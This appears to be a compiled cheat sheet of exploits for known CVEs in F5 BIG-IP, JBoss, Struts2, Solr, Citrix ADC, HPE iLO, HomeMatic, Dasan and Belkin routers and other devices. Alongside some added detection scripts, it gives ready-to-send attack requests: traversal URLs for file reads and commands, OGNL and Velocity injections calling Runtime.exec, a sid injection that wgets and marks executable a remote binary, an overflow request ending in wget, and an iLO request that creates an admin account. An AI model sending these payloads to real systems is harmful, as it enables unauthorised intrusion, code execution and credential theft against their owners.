CVE-2020-5902 - F5 BIG-IP Remote Code Execution

description

A remote code execution vulnerability exists in specific pages of the Traffic Management User Interface (TMUI), also called the Configuration utility, of F5 BIG-IP. An unauthenticated remote attacker who sends crafted requests to these pages can execute arbitrary Java code and from there control every function of the BIG-IP: run arbitrary system commands, start or stop services, create or delete files on the appliance, and so on.
The trick in both URLs below is the "/..;/" segment. The front-end web server authorises the request on the raw path, which begins with the unauthenticated /tmui/login.jsp, while Tomcat, which actually serves TMUI, strips the ";" path parameter from the segment and then resolves the "..", so the request it dispatches is the workspace JSP that normally sits behind authentication.

Arbitrary file read

  • https://IP:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=

Remote command execution (tmsh commands)

  • https://{0}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=
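
The normalisation mismatch the two URLs rely on, modelled in Python as an added example (not code from the page or from F5). It assumes a front end that authorises on the raw path with /tmui/login.jsp as the public prefix, and reproduces Tomcat's two steps, path-parameter removal followed by dot-segment resolution. The function names, the jsessionid sample and the query values are mine; the two attack URLs are the ones listed above.

```python
import posixpath
from urllib.parse import urlsplit

# Added example, not code from the original page or from F5. It models why the
# ..; trick reaches an authenticated JSP: the front end checks the raw path,
# Tomcat first drops ';...' path parameters from every segment and then
# resolves '..', so the two components disagree about which page is requested.

# Assumption for the model: everything under this prefix needs no session.
PUBLIC_PREFIX = "/tmui/login.jsp"


def tomcat_normalize(path: str) -> str:
    """Normalise a request path the way Tomcat does before dispatching.

    1. Drop the path-parameter part (';...') of every segment.
    2. Resolve '.' and '..' segments.
    """
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/".join(segments))


def proxy_allows(path: str) -> bool:
    """The naive front-end check: compare the raw path against the public prefix."""
    return path.startswith(PUBLIC_PREFIX)


def is_cve_2020_5902_request(url: str) -> bool:
    """Flag a request that the proxy lets through as the login page but that
    Tomcat would dispatch to something outside the public prefix."""
    raw = urlsplit(url).path
    if not proxy_allows(raw):
        return False          # not even pretending to be the login page
    served = tomcat_normalize(raw)
    return not served.startswith(PUBLIC_PREFIX)


def target_jsp(url: str) -> str:
    """The page Tomcat ends up serving (last segment of the normalised path)."""
    return posixpath.basename(tomcat_normalize(urlsplit(url).path))


if __name__ == "__main__":
    # Constructed sample requests: the two URLs from the notes, a normal login
    # request carrying a jsessionid path parameter, and a direct (authenticated)
    # request for the same JSP. Only the first two should be flagged.
    samples = [
        "https://IP:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
        "https://IP:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin",
        "https://IP:8443/tmui/login.jsp;jsessionid=0123456789ABCDEF",
        "https://IP:8443/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
    ]
    for s in samples:
        print(is_cve_2020_5902_request(s), target_jsp(s), s)
```

The jsessionid sample matters for detection: a ";" in the path is normal Tomcat behaviour, so the rule must compare the authorised prefix against the normalised path rather than just look for ";" or "..".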

reference

https://github.com/zhzyker/exphub/tree/master/f5
https://github.com/dunderhay/CVE-2020-5902/blob/master/CVE-2020-5902.py

Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Remote Code Execution

description

Dasan GPON ONT WiFi Router is a wireless router made by DASAN Networks (South Korea). Firmware versions H640X 12.02-01121, 2.77p1-1124 and 3.03p2-1146 contain a buffer overflow: an attacker can execute arbitrary code by sending an over-long POST request to the 'login_action' function in /cgi-bin/login_action.cgi. In the Exploit-DB request below the action parameter carries the padding, the overwriting bytes (raw binary, which appears garbled here) and the wget command that ends up being executed.

POST /cgi-bin/login_action.cgi HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.100:8080/cgi-bin/login.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 868

action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*Ԍ�CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC*�@;;;;;;;;;;;;;;;;;;;;;;;;wget http://1.1.1.1&txtUserId=a&button=Login&txtPassword=a&sle_Language=english

reference

https://www.exploit-db.com/exploits/44074

JBoss

description

CVE-2017-12149 - JBoss 5.x/6.x deserialization vulnerability

  • The flaw is in the /invoker/readonly handler: the server Java-deserializes whatever the client submits as the POST body.
    Sending the serialized data directly as the POST body to /invoker/readonly is enough.

CVE-2017-7504 - JBoss 4.x JBossMQ JMS deserialization vulnerability

  • The flaw is in /jbossmq-httpil/HTTPServerILServlet; POST the serialized data directly.

CVE-2015-7501 - JMXInvokerServlet deserialization vulnerability

  • The flaw is in /invoker/JMXInvokerServlet, same pattern as the previous one.

In all three cases the body is a raw Java serialization stream (it starts with the bytes AC ED 00 05); the gadget chain, typically one of the commons-collections chains, has to match a library present on the server's classpath.

jmx-console and web-console

  • /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
  • /web-console/ServerInfo.jsp

These two are the classic JBoss management consoles; a response to either URL without a login shows that the console is exposed.
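
A body-level check for the three deserialization endpoints, as an added example (not code from the page or from JBoss). It assumes the request has already been split into method, path and body; the endpoint-to-CVE table is taken from the notes above, and the sample stream in the test is a constructed, truncated serialization header, not a real gadget chain.

```python
# Added example, not code from the page or from JBoss. All three endpoints in
# the notes hand the raw POST body to Java deserialization, so the signature is
# simply: POST to one of them with a body that starts with the Java
# serialization stream header (STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005).

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72

DESERIALIZATION_ENDPOINTS = {
    "/invoker/readonly": "CVE-2017-12149",
    "/jbossmq-httpil/HTTPServerILServlet": "CVE-2017-7504",
    "/invoker/JMXInvokerServlet": "CVE-2015-7501",
}


def is_java_serialized(body: bytes) -> bool:
    return body[:4] == JAVA_STREAM_MAGIC


def first_class_name(body: bytes):
    """Return the first class name in a serialization stream, or None.

    After the 4-byte header the first element of a gadget payload is normally
    TC_OBJECT followed by TC_CLASSDESC and a modified-UTF-8 string: a 2-byte
    big-endian length, then the bytes. Anything else (arrays, strings, blocks)
    is left alone rather than guessed at.
    """
    if not is_java_serialized(body) or len(body) < 8:
        return None
    if body[4] != TC_OBJECT or body[5] != TC_CLASSDESC:
        return None
    n = int.from_bytes(body[6:8], "big")
    name = body[8:8 + n]
    return name.decode("utf-8", "replace") if len(name) == n else None


def classify_request(method: str, path: str, body: bytes):
    """Return (cve, first_class_name) when the request is a deserialization
    attempt against one of the known endpoints, else None."""
    cve = DESERIALIZATION_ENDPOINTS.get(path.split("?", 1)[0])
    if cve is None or method.upper() != "POST" or not is_java_serialized(body):
        return None
    return cve, first_class_name(body)


if __name__ == "__main__":
    # Constructed, truncated stream: header, TC_OBJECT, TC_CLASSDESC, class name.
    sample = b"\xac\xed\x00\x05\x73\x72\x00\x11java.util.HashMap" + b"\x00" * 8
    for p in ("/invoker/readonly", "/invoker/JMXInvokerServlet", "/jmx-console/HtmlAdaptor"):
        print(p, classify_request("POST", p, sample))
```

The class name is worth logging: the first class in a real payload (a commons-collections map, an AnnotationInvocationHandler, and so on) tells you which gadget chain was thrown at the server, and therefore which library the attacker believed was on the classpath.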

reference

https://github.com/vulhub/vulhub/tree/master/jboss
https://www.exploit-db.com/exploits/36575

CVE-2018-11776 - Apache Struts2 S2-057

description

struts-pwn_CVE-2018-11776 checks with an arithmetic probe: it draws a random number, say 93, builds ${{93*93}} and substitutes it for one part of the URL path.

Taking http://example.com/demo/struts2-showcase/index.action as an example, three injection points are built and tested in turn:
http://example.com/${{93*93}}/index.action
http://example.com/demo/${{93*93}}/index.action
http://example.com/demo/struts2-showcase/${{93*93}}/index.action

GET /$%7B%7B93*93%7D%7D/index.action HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)

If the Location header of the response carries the computed value (93*93 = 8649), the target is vulnerable: with S2-057 the namespace taken from the URL is evaluated as OGNL when Struts builds the redirect for the action, which is why the result surfaces in Location rather than in the body. The real payload is then built for the injection point that responded:

GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27<----PAYLOAD---->%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/index.action HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)

reference

https://github.com/mazen160/struts-pwn_CVE-2018-11776

HomeMatic Zentrale CCU2 RCE

description

First send a GET request to /api/backup/version.cgi

GET /api/backup/version.cgi HTTP/1.1
Accept-Encoding: identity
Host: x.x.x.x
Connection: close
User-Agent: Python-urllib/2.7

If the response contains VERSION=x.x.x, send the payload. The sid parameter is not validated: the value closes the quoted string it is placed in and appends a system.Exec() call, so the device fetches and marks executable whatever /tmp/exploit the attacker hosts.

GET /api/backup/logout.cgi?sid=aa");system.Exec("wget+-O+/tmp/exploit+http://127.0.0.1:1234/exploit&&chmod+%2bx+/tmp/exploit");system.ClearSessionID("bb HTTP/1.1
Accept-Encoding: identity
Host: x.x.x.x
Connection: close
User-Agent: Python-urllib/2.7
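
What the sid value above turns into on the device, reconstructed in Python as an added example (not code from the page or from the CCU2 firmware). The one assumption, inferred from the shape of the payload (it opens with '")' and ends with 'system.ClearSessionID("'), is that logout.cgi splices the sid into a script statement of the form system.ClearSessionID("<sid>"); the template constant and the function names are mine.

```python
from urllib.parse import unquote_plus

# Added example, not from the page or from the CCU2 firmware. It shows the
# string-context breakout: the sid lands inside a quoted argument, the payload
# closes that argument and call, adds a system.Exec(...) statement, and reopens
# a quoted call so that the script stays syntactically valid.

# Assumed statement the sid is spliced into (inferred from the payload's shape).
TEMPLATE = 'system.ClearSessionID("%s")'


def raw_sid(request_target: str) -> str:
    """Take sid from the raw query string. The payload contains '&&', so a
    parser that splits on '&' first would cut the command in half; the
    request relies on the CGI not doing that."""
    query = request_target.split("?", 1)[1] if "?" in request_target else ""
    marker = "sid="
    idx = query.find(marker)
    return "" if idx < 0 else unquote_plus(query[idx + len(marker):])


def injected_script(sid: str) -> str:
    return TEMPLATE % sid


def statements(script: str) -> list:
    """Split a script on ';' outside double-quoted strings."""
    out, cur, in_str = [], [], False
    for ch in script:
        if ch == '"':
            in_str = not in_str
        if ch == ";" and not in_str:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if "".join(cur).strip():
        out.append("".join(cur).strip())
    return out


def is_sid_injection(request_target: str) -> bool:
    """A benign sid yields exactly one statement; a breakout yields more."""
    return len(statements(injected_script(raw_sid(request_target)))) > 1


if __name__ == "__main__":
    # The request target from the notes above (without the HTTP/1.1 suffix).
    target = ('/api/backup/logout.cgi?sid=aa");system.Exec("wget+-O+/tmp/exploit+'
              'http://127.0.0.1:1234/exploit&&chmod+%2bx+/tmp/exploit");system.ClearSessionID("bb')
    for s in statements(injected_script(raw_sid(target))):
        print(s)
```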

reference

https://www.exploit-db.com/exploits/45052

CVE-2019-0192 & CVE-2019-0193 - Apache Solr RCE

description

CVE-2019-0192

  1. GET /solr/admin/cores?wt=json; if the response carries a status object such as {"status":{"abcdefgh":"1"}}, a core exists (abcdefgh is the core name used in the following requests).
  2. Then POST to /solr/abcdefgh/config. For CVE-2019-0192 the body is a Config API set-property that points jmx.serviceUrl at an attacker-controlled RMI service; Solr connects to it and deserializes what it receives.

CVE-2019-0193

  1. GET /solr/admin/cores; as above, a status field in the response means a core exists.
  2. GET /solr/admin/info/system and read the name, uname and version values from the system object.
  3. POST to /solr/abcdefgh/config to initialise the node config; for the Velocity path this is an update-queryresponsewriter that enables params.resource.loader.enabled, so that a template can be supplied in the request itself.
  4. GET /select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27<-----command----->%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end executes arbitrary code.

Steps 3 and 4 of the second procedure are the VelocityResponseWriter template injection, which was assigned CVE-2019-17558; CVE-2019-0193 proper is the DataImportHandler dataConfig issue.
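
Checks for the two request shapes in the procedures above, as an added example (not code from the page or from Solr): the Config API POST where the attacker-controlled setting arrives (jmx.serviceUrl for CVE-2019-0192, params.resource.loader.enabled for the Velocity path) and the /select request carrying the inline template. The request bodies and the core name in the sample are constructed; the template is a shortened form of the one above.

```python
import json
from urllib.parse import unquote_plus

# Added example, not from the page or from Solr. Two inspection points:
#  - POST /solr/<core>/config: set-property with jmx.serviceUrl (CVE-2019-0192),
#    or update-queryresponsewriter enabling params.resource.loader.enabled
#    (prerequisite of the Velocity template execution);
#  - GET /solr/<core>/select: wt=velocity with an inline v.template.custom that
#    reaches into java.lang through the class.forName trick.


def parse_query(target: str) -> dict:
    """Split '/path?a=b&c=d' into a dict, decoding %XX and '+' as the server would."""
    params = {}
    qs = target.split("?", 1)[1] if "?" in target else ""
    for pair in qs.split("&"):
        if pair:  # the '&&' in the URL above yields an empty pair; skip it
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def check_config_post(path: str, body: str):
    """Inspect a POST to /solr/<core>/config; return a list of findings or None."""
    if not (path.startswith("/solr/") and path.endswith("/config")):
        return None
    try:
        cfg = json.loads(body)
    except ValueError:
        return None
    hits = []
    props = cfg.get("set-property", {})
    if isinstance(props, dict) and "jmx.serviceUrl" in props:
        hits.append("CVE-2019-0192 jmx.serviceUrl=%s" % props["jmx.serviceUrl"])
    writer = cfg.get("update-queryresponsewriter", {})
    if (isinstance(writer, dict)
            and "VelocityResponseWriter" in str(writer.get("class", ""))
            and str(writer.get("params.resource.loader.enabled", "")).lower() == "true"):
        hits.append("velocity params.resource.loader.enabled")
    return hits or None


def check_select(target: str):
    """Inspect a GET to a core's /select handler for an inline Velocity template."""
    path = target.split("?", 1)[0]
    if not path.endswith("/select"):
        return None
    p = parse_query(target)
    if p.get("wt") != "velocity" or p.get("v.template") != "custom":
        return None
    tmpl = p.get("v.template.custom", "")
    markers = [m for m in ("class.forName", "java.lang.Runtime", ".exec(") if m in tmpl]
    return markers or None


if __name__ == "__main__":
    # Constructed bodies (core name abcdefgh as in the notes; RMI host is a placeholder).
    jmx = '{"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://127.0.0.1:1099/obj"}}'
    vel = ('{"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", '
           '"class": "solr.VelocityResponseWriter", "template.base.dir": "", '
           '"solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}')
    print(check_config_post("/solr/abcdefgh/config", jmx))
    print(check_config_post("/solr/abcdefgh/config", vel))
    print(check_select("/solr/abcdefgh/select?q=1&&wt=velocity&v.template=custom"
                       "&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))"
                       "+%23set($ex=$rt.getRuntime().exec(%27id%27))"))
```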

reference

https://github.com/Imanfeng/Apache-Solr-RCE
https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py
https://www.exploit-db.com/exploits/47572

Belkin N600DB - Multiple Vulnerabilities

description

Disclosure of the WiFi password:
curl --silent "http://192.168.2.1/langchg.cgi"
curl --silent "http://192.168.2.1/adv_wifidef.cgi"
Closing the "HTTPD server" port:
curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
Web backdoor:
http://192.168.2.1/dev.htm
Server-Side Request Forgery (HTTP/FTP):
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
Command injection (the url parameter reaches a command line unescaped; url=--help is interpreted as an option):
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=--help"

reference

https://www.exploit-db.com/exploits/43682

AVTECH DVR multiple vulnerabilities

description

Multiple vulnerabilities were found in the AVTECH AVN801 DVR:

  1. CVE-2013-4980: arbitrary code execution through a buffer overflow in the RTSP packet handler, triggered by the over-long URI in the SETUP request below
    SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0
    CSeq: 1
    User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)
  2. CVE-2013-4981: arbitrary code execution through a buffer overflow in /cgi-bin/user/Config.cgi, triggered by a crafted HTTP POST (the over-long Network.SMTP.Receivers value below)
    POST /cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
    Host: x.x.x.x
    Accept-Encoding: identity
    Content-Length: 0
  3. CVE-2013-4982: bypass of the CAPTCHA on the administrative login console, which opens the door to automated attacks such as credential guessing. The URI contains /cgi-bin/nobody/VerifyCode.cgi; the account value is base64 (YWRtaW46YWRtaW4= decodes to admin:admin)
    GET /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1
    Host: x.x.x.x
    Accept-Encoding: identity

reference

https://www.coresecurity.com/core-labs/advisories/avtech-dvr-multiple-vulnerabilities

CVE-2017-12542

description

iLO (Integrated Lights-Out) is the remote management controller built into certain HPE server models; it lets administrators manage the server remotely, independently of the operating system. CVE-2017-12542 in iLO 4 lets an unauthenticated remote attacker bypass authentication and execute arbitrary code.
Authentication is bypassed when the request URI is /rest/v1/Accountservice/Accounts and the Connection header of the HTTP request is 29 or more characters long. The exploit decides from the JSON it gets back for such a request: an error object means the bypass failed, an account listing (Items) means it worked.
POSTing the account-creation document below to the same URI, again with a Connection header of at least 29 characters, adds a new privileged user.

POST /rest/v1/accountservice/accounts HTTP/1.1
Host: x.x.x.x
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1
Content-Length: 253
Content-Type: application/json

{"UserName": "admin", "Password": "admin123", "Oem": {"Hp": {"Privileges": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true}, "LoginName": "admin"}}}

reference

https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py
https://www.freebuf.com/vuls/167124.html

CVE-2019-19781

description

An RCE in Citrix ADC (NetScaler). The front end enforces authentication on /vpns/ but not on /vpn/, and it does not normalise a /vpn/../vpns/ path, so the Perl scripts under /vpns/portal/scripts/ become reachable without credentials. Inside those scripts the NSC_USER header is used as a file name, so a second traversal in that header writes an attacker-controlled template under /netscaler/portal/templates/.

  • First, a POST request uses the directory traversal to create the malicious XML template; the payload, a Perl Template Toolkit directive that runs readpipe(), is in the POST data
    POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
    NSC_USER: ../../../netscaler/portal/templates/sobxivwokx
    NSC_NONCE: 7
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 97

    url=127.0.0.1&title=[% template.new({'BLOCK'='print readpipe( xxxx )'})%]&desc=desc&UI_inuse=a
  • Then a GET request for the written template makes the portal render it, which executes the payload
    GET /vpn/../vpns/portal/sobxivwokx.xml HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
    NSC_USER: dgxgvoankd
    NSC_NONCE: 7

reference

https://github.com/MalwareTech/CitrixHoneypot/blob/master/CitrixHoneypot.py
https://github.com/trustedsec/cve-2019-19781
https://github.com/jas502n/CVE-2019-19781
https://www.jianshu.com/p/03b175711524
https://www.anquanke.com/post/id/197074?native.theme=2

Kguard SHA104 / SHA108 Bypass / Command Injection

description

The SHA104 and SHA108 are digital video recorders made by Kguard. Their handling of authentication and authorisation is broken: for instance, the HI_SRDK_SYS_USERMNG_GetUserList request below returns every user name and password without any credentials:

REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0
CSeq: 6
Accept: text/HDP
Content-Type: text/HDP
Func-Version: 0x10
Content-Length: 51
Segment-Num: 1
Segment-Seq: 1
Data-Length: 4
MCTP/1.0 200 OK
Content-Type: text/HDP
CSeq: 6
Return-Code: 0
Content-Length: 2326
Segment-Num: 2
Segment-Seq: 1
Data-Length: 2240
eric
111222
111222
admin
111222
111222
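
A parser for the MCTP exchange above, as an added example (not code from the page or from Kguard). It assumes only what the two messages show: a request line of the form REMOTE <command> MCTP/1.0, a status line of the form MCTP/1.0 <code> <reason>, colon-separated headers, and raw data lines after them; the pairing of request and response by CSeq and the function names are mine.

```python
# Added example, not from the page or from Kguard. Parses MCTP request and
# response messages as shown in the notes and pairs a GetUserList request with
# the response that leaks the account list.


def parse_mctp(raw: str) -> dict:
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    first = lines[0].split()
    msg = {"headers": {}, "data": []}
    if first and first[0].startswith("MCTP/"):            # MCTP/1.0 200 OK
        msg.update(kind="response", version=first[0],
                   status=int(first[1]), reason=" ".join(first[2:]))
    elif len(first) == 3 and first[2].startswith("MCTP/"):  # REMOTE <cmd> MCTP/1.0
        msg.update(kind="request", method=first[0], command=first[1], version=first[2])
    else:
        raise ValueError("not an MCTP message: %r" % lines[0])
    # Headers run until the first line without a colon; what follows is data.
    i = 1
    while i < len(lines) and ":" in lines[i]:
        name, _, value = lines[i].partition(":")
        msg["headers"][name.strip()] = value.strip()
        i += 1
    msg["data"] = lines[i:]
    return msg


def is_mctp(start_line: str) -> bool:
    """Honeypot/IDS tell: MCTP/1.0 sits where an HTTP version would appear."""
    parts = start_line.split()
    return bool(parts) and (parts[0].startswith("MCTP/") or parts[-1].startswith("MCTP/"))


def leaked_user_list(request: dict, response: dict):
    """Pair a GetUserList request with its response by CSeq and return the
    non-empty data lines (user names and passwords) when Return-Code is 0."""
    if request.get("command") != "HI_SRDK_SYS_USERMNG_GetUserList":
        return None
    if request["headers"].get("CSeq") != response["headers"].get("CSeq"):
        return None
    if response.get("status") != 200 or response["headers"].get("Return-Code") != "0":
        return None
    return [line for line in response["data"] if line.strip()]


if __name__ == "__main__":
    # The two messages from the notes above (response data truncated as shown there).
    req = parse_mctp("REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0\nCSeq: 6\nAccept: text/HDP\n"
                     "Content-Type: text/HDP\nFunc-Version: 0x10\nContent-Length: 51\n"
                     "Segment-Num: 1\nSegment-Seq: 1\nData-Length: 4\n")
    resp = parse_mctp("MCTP/1.0 200 OK\nContent-Type: text/HDP\nCSeq: 6\nReturn-Code: 0\n"
                      "Content-Length: 2326\nSegment-Num: 2\nSegment-Seq: 1\nData-Length: 2240\n"
                      "eric\n111222\n111222\nadmin\n111222\n111222\n")
    print(req["command"], resp["status"], leaked_user_list(req, resp))
```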

The tell-tale sign in the request line is the protocol field where the HTTP version would normally be: MCTP/1.0. The same unauthenticated channel allows other operations as well, such as changing a user's password.

reference

https://cxsecurity.com/issue/WLB-2015030061

IBM QRadar SIEM Unauthenticated Remote Code Execution

description

uri: /ForensicsAnalysisServlet/
The second reference describes the full exploitation chain.

GET /ForensicsAnalysisServlet/?action=someaction HTTP/1.1
Cookie: SEC=owned; QRadarCSRF=superowned;

HTTP/1.1 200 OK
{"exceptionMessageValue":"javax.servlet.ServletException: No valid forensics analysis solrDocIds parameter found."}

The SEC and QRadarCSRF cookies carry arbitrary values; a 200 response with this servlet exception shows that the request reached the servlet's parameter handling without any authentication.

reference

https://www.exploit-db.com/exploits/45005
https://ssd-disclosure.com/ssd-advisory-qradar-remote-command-execution/

Else

docker, es, hbase, hadoop, phpadmin, cms, couchdb, orientdb, upnp, ipmi, rpc, a2billing, boa